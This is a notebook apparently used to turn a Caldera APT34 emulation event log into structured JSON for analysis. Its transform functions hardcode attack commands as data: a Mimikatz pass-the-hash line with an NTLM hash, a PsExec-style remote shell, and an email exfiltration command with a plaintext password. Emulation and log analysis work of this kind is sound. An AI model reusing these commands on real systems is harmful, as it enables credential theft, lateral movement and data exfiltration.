**Purpose of the Script**:

The script processes a Caldera event log JSON file to generate a new structured JSON file where each command is transformed based on predefined transformation functions. It handles both simple and complex commands, creating new entries when necessary.

**Function Breakdown**:

- **Utility Functions**:

    - `convert_to_desired_format`(timestamp):
    
        Converts a timestamp from ISO format to the format: '%Y-%m-%d %H:%M:%S.%f'. Handles missing or invalid timestamps.

    -   `filter_parameters`(entry):
        
        Extracts the relevant fields (delegated_timestamp, collected_timestamp, finished_timestamp, tactic, technique_name, ability_name) from a log entry and formats timestamps properly.

    -   `parse_entry_ranges`(entry_ranges):
    
        Parses a string of ranges (like "0-24,30,32") and returns a set of integers representing the included entries.

**Transformation Functions**:

- **Simple Transformation Functions**:
    
    Each function takes a command from the original entry, applies a specific transformation, and returns the new command.

    -   `transform_function_1`: Directly returns the command as-is.

    -   `transform_function_2`: Extracts a command from a string formatted with --data "cmd=..." and wraps it with "cmd.exe" /c.

    - `transform_function_3`: Extracts file paths from command strings using regex.

    - `transform_function_4`: Removes exec-background and cleans up double quotes.

- **Complex Transformation Functions**:
    
    These functions generate multiple commands from a single original entry.

    - `transform_complex_38`: Produces 3 specific commands related to privilege escalation and file operations.

    - `transform_complex_40`: Generates a command related to data exfiltration via VMware.

    - `transform_complex_41`: Produces 4 commands related to cleanup and process termination.

- **Core Processing Functions**:

    - `apply_transformation`(commands, index, func_name, current_entry_num):
    
        Dynamically calls the appropriate transformation function based on its name.

    - `process_entries_sequentially`(data, commands):
    
        Iterates over each entry from the original log, applies the correct transformation function based on a predefined mapping, and collects the transformed commands. Handles both simple and complex cases.

    - `create_transformed_output`(data, transformed_commands):
    
        Constructs the final output dictionary with transformed commands and filtered fields. It ensures that new entries generated from complex commands retain metadata from the original entry.

- **Main Script Logic**:

    - `main`(input_file, output_file):
    
    Reads the input JSON file, extracts commands, processes them sequentially, generates the transformed output, and saves it to the specified output file.

**Execution**:

The script reads a Caldera event log file (apt34-test 1_event-logs.json), transforms the commands based on specific rules, and writes the structured output to a new file (apt34-test 1_event-logs_extracted_information.json).

In [1]:
caldera_event_log_file = 'apt34-test 1_event-logs.json'
output_json_path = 'apt34-test 1_event-logs_extracted_information.json'

In [2]:
import json
import re
from datetime import datetime

# Convert timestamp to desired format
def convert_to_desired_format(timestamp):
    if not timestamp:
        return None
    try:
        ts = timestamp.replace("Z", "")
        dt = datetime.fromisoformat(ts)
        return dt.strftime('%Y-%m-%d %H:%M:%S.%f')
    except ValueError:
        return None

# Fields to include in the final output
FIELDS_TO_INCLUDE = [
    "delegated_timestamp", "collected_timestamp", "finished_timestamp", 
    "tactic", "technique_name", "ability_name"
]

# Mapping of entry ranges to transformation functions
TRANSFORM_MAPPING = {
    1: ("0-22,24,30,32,42-43", "transform_function_1"),
    2: ("25-27,29,31",       "transform_function_2"),
    3: ("28,35-37",          "transform_function_3"),
    4: ("33-34",             "transform_function_4"),
    5: ("23",                "transform_complex_23"),
    6: ("38",                "transform_complex_38"),
    7: ("40",                "transform_complex_40"),
    8: ("41",                "transform_complex_41"),
}

# Extract only the required metadata from an entry
def filter_parameters(entry):
    return {
        "delegated_timestamp": convert_to_desired_format(entry.get("delegated_timestamp", "")),
        "collected_timestamp": convert_to_desired_format(entry.get("collected_timestamp", "")),
        "finished_timestamp":  convert_to_desired_format(entry.get("finished_timestamp", "")),
        "tactic":        entry.get("attack_metadata", {}).get("tactic", ""),
        "technique_name":entry.get("attack_metadata", {}).get("technique_name", ""),
        "ability_name":  entry.get("ability_metadata", {}).get("ability_name", "")
    }

# Parse a string like "0-5,10,12-14" into a set of integers
def parse_entry_ranges(ranges):
    s = set()
    for part in ranges.split(","):
        if "-" in part:
            a,b = map(int, part.split("-"))
            s.update(range(a, b+1))
        else:
            s.add(int(part))
    return s

# --- simple transform fns ---------------------------------------------------
def transform_function_1(commands, index, current_entry_num):
    return { str(current_entry_num): (index, commands[index]) }, current_entry_num + 1

def transform_function_2(commands, index, current_entry_num):
    m = re.search(r'--data "cmd=([^"]+)"', commands[index])
    cmd = f'"cmd.exe" /c {m.group(1)}' if m else commands[index]
    return { str(current_entry_num): (index, cmd) }, current_entry_num + 1

def transform_function_3(commands, index, current_entry_num):
    m1 = re.search(r"-F 'sav=([^']+)'", commands[index])
    m2 = re.search(r'-F "nen=([^"]+)"', commands[index])
    cmd = f"{m1.group(1)}\\{m2.group(1)}" if m1 and m2 else commands[index]
    return { str(current_entry_num): (index, cmd) }, current_entry_num + 1

def transform_function_4(commands, index, current_entry_num):
    cmd = re.sub(r"^exec-background\s+", "", commands[index]).replace('"', '')
    return { str(current_entry_num): (index, cmd) }, current_entry_num + 1

def transform_complex_23(commands, index, current_entry_num):
    derived = [
        commands[index],
        r'C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\exchweb\ews'
    ]

    out = {}
    for cmd in derived:
        out[str(current_entry_num)] = (index, cmd)
        current_entry_num += 1
    return out, current_entry_num

# --- complex transform fns --------------------------------------------------
def transform_complex_38(commands, index, current_entry_num):
    derived = [
        r'C:\Windows\system32\cmd.exe',
        r'C:\Windows\System32\mom64.exe  ""privilege::debug"" ""sekurlsa::pth /user:tous /domain:boombox /ntlm:30d804728ae8ca806fa183a81d8b97b0""',
        # r'C:\Windows\Temp\Nt.dat',
        r'C:\ProgramData\Nt.dat',
        r'C:\Windows\System32\ps.exe  \\10.1.0.7 cmd.exe'
    ]

    out = {}
    for cmd in derived:
        out[str(current_entry_num)] = (index, cmd)
        current_entry_num += 1
    return out, current_entry_num

def transform_complex_40(commands, index, current_entry_num):
    derived = [
        r'C:\ProgramData\VMware',
        # r'C:\ProgramData\VMware\VMware.exe  --path=""sitedata.bak"" --to=""dungeon@shirinfarhad.com"" --from=""gosta@boombox.local"" --server=""10.1.0.6"" --password=\'Bl1nk182@g\' --chunksize=""200000""'
        'C:\\ProgramData\\VMware\\VMware.exe  --path="sitedata.bak" --to="dungeon@shirinfarhad.com" --from="gosta@boombox.local" --server="10.1.0.6" --password=\'Bl1nk182@g\' --chunksize="200000"'
    ]
    out = {}
    for cmd in derived:
        out[str(current_entry_num)] = (index, cmd)
        current_entry_num += 1
    return out, current_entry_num

def transform_complex_41(commands, index, current_entry_num):
    derived = [
        r'C:\ProgramData\VMware\VMware.exe',
        r'C:\Windows\System32\mom64.exe',
        r'C:\Windows\Temp\Nt.dat',
        r'C:\Windows\System32\ps.exe'
    ]
    out = {}
    for cmd in derived:
        out[str(current_entry_num)] = (index, cmd)
        current_entry_num += 1
    return out, current_entry_num

# --- core processing --------------------------------------------------------
def process_entries(data, commands):
    transformed = {}
    current_num = 0

    for idx, entry in enumerate(data):
        # pick the right transformer
        for ranges, fn_name in TRANSFORM_MAPPING.values():
            if idx in parse_entry_ranges(ranges):
                fn = globals()[fn_name]
                raw_map, current_num = fn(commands, idx, current_num)
                # wrap each with metadata
                for new_i, (orig_i, cmd) in raw_map.items():
                    transformed[new_i] = {
                        "new_command": cmd,
                        **filter_parameters(data[orig_i])
                    }
                break
        else:
            # no special transform
            transformed[str(current_num)] = {
                "new_command": commands[idx],
                **filter_parameters(entry)
            }
            current_num += 1

    return transformed

# --- entry point ------------------------------------------------------------
def main(input_file, output_file):
    with open(input_file) as f:
        data = json.load(f)
    cmds = [e.get("command", "") for e in data]
    result = process_entries(data, cmds)
    with open(output_file, "w") as out:
        json.dump(result, out, indent=4)
    print("Transformed data saved to", output_file)

In [3]:
main(caldera_event_log_file, output_json_path)

Transformed data saved to apt34-test 1_event-logs_extracted_information.json
